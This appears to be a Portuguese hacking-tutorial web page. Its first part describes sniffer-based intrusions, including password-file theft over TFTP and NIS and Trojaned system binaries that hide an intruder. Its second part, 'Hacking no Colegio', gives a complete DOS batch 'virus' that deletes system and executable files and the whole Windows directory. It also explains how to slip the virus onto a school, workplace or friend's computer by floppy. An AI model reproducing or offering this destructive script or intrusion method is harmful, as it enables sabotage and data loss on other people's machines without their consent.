Ataque por Monitoração

 

  • Os ataques por monitoração são baseados em software de monitoração de rede conhecido como "sniffer", instalado surrepticiamente pelos invasores.
  • O sniffer grava os primeiros 128 bytes de cada sessão login, telnet e FTP session vista naquele segmento de rede local, comprometendo TODO o tráfego de/para qualquer máquina naquele segmento, bem como o tráfego que passar por aquele segmento.
  • Os dados capturados incluem o nome do host destino, o username e a password.
  • A informação é gravada num arquivo posteriormente recuperado pelo invasor para ter acesso a outras máquinas.
  • Em muitos casos os invasores obtem acesso inicial aos sistemas usando uma das seguintes técnicas:
  • Obtem o arquivo de passwords via TFTP em sistemas impropriamente configurados
  • Obtem o arquivo de password de sistemas rodando versões inseguras do NIS
  • Obtem acesso ao sistema de arquivos locais via pontos exportados para montagem com NFS, sem restrições
  • Usam um nome de login e password capturada por um sniffer rodando em outro sistema.
  • Uma vez no sistema, os invasores obtem privilegios de root explorando vulnerabilidades conhecidas, tal como rdist, Sun Sparc integer division, e arquivos utmp passíveis de escrita por todo mundo ou usando uma password de root capturada.
  • Eles então instalam o software sniffer, registrando a informação capturada num arquivo invisível.
  • Adicionalemente, eles instalam cavalos de Troia em substituição e uma ou mais dentre os seguintes arquivos do sistema, para ocultar sua presença:
    • /bin/login
    • /usr/etc/in.telnetd
    • /usr/kvm/ps
    • /usr/ucb/netstat

 

Hacking no Colegio

 

Este texto irá ensinar, de modo fácil, destruir o computadorzinho da sua escola (ou de amigo, trabalho, etc.).

Primeiro, crie em seu computador um arquivo de lote (nem precisa compilar), se não souber aí vai, pelo DOS digite:
 

copy con arquivo.bat <enter>
@echo off <enter>
@echo Frase de sua preferência <enter>
del *.sys <enter>
del *.exe <enter>
del *.com <enter>
cd windows <enter>
del *.* <enter>
cd\ <enter>
del arquivo.bat <enter>
@echo Frase de sua preferência <enter>
<tecla F6> <enter>

Pronto, um arquivo vírus de lote foi criado em seu computador, calmaaaaa!!!! Hehe, ele não fará nada contanto que você não digite "arquivo" no diretório onde ele está.

Remova este arquivo (arquivo.bat) para um disquete, junto a ele um "config.sys", com a linha de comando: C:\arquivo.bat.

Agora é com você! Leve o disquete para a escoola (trabalho, casa de amigo, etc.) e quando tiver uma oportunidade, insira o disco na unidade referente (geralmente a:) e copie os arquivos para o diretório C:\. Pronto! Retire o disco e diga tchau, hehe.

Anterior                                                                                                 Próxima